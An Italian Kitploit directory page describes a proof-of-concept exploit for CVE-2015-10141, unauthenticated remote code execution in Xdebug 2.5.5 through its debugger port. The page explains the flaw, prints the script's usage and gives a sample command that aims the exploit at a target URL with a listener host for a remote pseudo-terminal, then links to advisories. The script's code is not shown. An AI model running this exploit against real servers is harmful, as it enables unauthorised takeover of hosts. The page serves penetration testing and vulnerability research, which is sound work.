Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2015-10141 — POC exploit per CVE-2015-10141 | Kitploit
Strumenti/GitHubGitHub/d3ext/cve-2015-10141
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubd3ext/cve-2015-10141

CVE-2015-10141

POC exploit per CVE-2015-10141

Vedi Repository
31911 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2015-10141

root@kitploit:~
# Exploit Title: xdebug Unauthenticated Command Execution
# Exploit Author: D3Ext
# Vendor Homepage: https://xdebug.org/
# Sofware Link: https://pecl.php.net/package/xdebug/2.5.5/windows
# Version: 2.5.5
# Tested on: Kali Linux 2025
# CVE: CVE-2015-10141

Spiegazione

Una vulnerabilità di iniezione di comandi OS non autenticata esiste nelle versioni di Xdebug 2.5.5 e precedenti, un'estensione di debugging per PHP. Quando il debugging remoto è abilitato, Xdebug ascolta sulla porta 9000 e accetta comandi del protocollo debugger senza autenticazione. Un utente malintenzionato può inviare un comando eval modificato tramite questa interfaccia per eseguire codice PHP arbitrario, che può invocare funzioni a livello di sistema come system() o passthru(). Ciò comporta il completo compromesso dell'host sotto i privilegi dell'utente del server web.

Utilizzo

root@kitploit:~
usage: CVE-2015-10141.py [-h] -u URL -l LHOST

CVE-2015-10141 - xdebug v2.5.5 RCE Exploit

options:
  -h, --help         show this help message and exit
  -u, --url URL      URL of the target
  -l, --lhost LHOST  LHOST to trigger the RCE

Basta eseguire l'exploit e fornire un URL valido con un file PHP come index.php e l'host locale. Poi l'exploit proverà a stabilire un pseudo-terminale che permette di eseguire comandi da remoto.

root@kitploit:~
python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3
Scarica lo strumento

Tieni presente che in alcuni casi l'output non verrà riflesso affatto e vedrai solo la prima riga del comando eseguito, questo non è un problema dello script, la vulnerabilità funziona così)

Riferimenti

root@kitploit:~
https://github.com/advisories/GHSA-267w-63f8-m896
https://www.exploit-db.com/exploits/44568
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
https://nvd.nist.gov/vuln/detail/CVE-2015-10141
https://www.wiz.io/vulnerability-database/cve/cve-2015-10141
https://feedly.com/cve/CVE-2015-10141
https://www.tenable.com/plugins/nessus/112210

Licenza

Questo progetto è sotto licenza MIT

Copyright © 2025, D3Ext